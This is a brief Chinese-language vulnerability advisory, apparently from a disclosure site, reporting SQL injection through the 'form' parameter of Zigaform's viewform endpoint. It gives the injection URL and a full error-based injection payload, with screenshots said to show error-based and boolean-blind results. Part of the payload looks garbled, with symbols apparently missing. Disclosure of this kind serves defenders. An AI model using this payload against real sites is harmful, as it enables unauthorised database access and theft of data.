Zigaform - SQL 注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

Zigaform的model_forms.php中的form参数带入SQL语句导致SQL注入 注入点: http://localhost/[PATH]/formbuilder/frontend/viewform/?form=[SQL] payload: AND (SELECT 2120 FROM(SELECT COUNT(),CONCAT(0x716a7a6271,(SELECT (ELT(2120=2120,1))),0x7171767071,FLOOR(RAND(0)2),md5(233))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) 报错注入如下: ![](https://images.seebug.org/contribute/e4b8793f-19df-4a15-89e7-3d8344807968) 布尔盲注如下: ![](https://images.seebug.org/contribute/b2019a66-76a0-4c2c-8f14-e9379409db2c)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息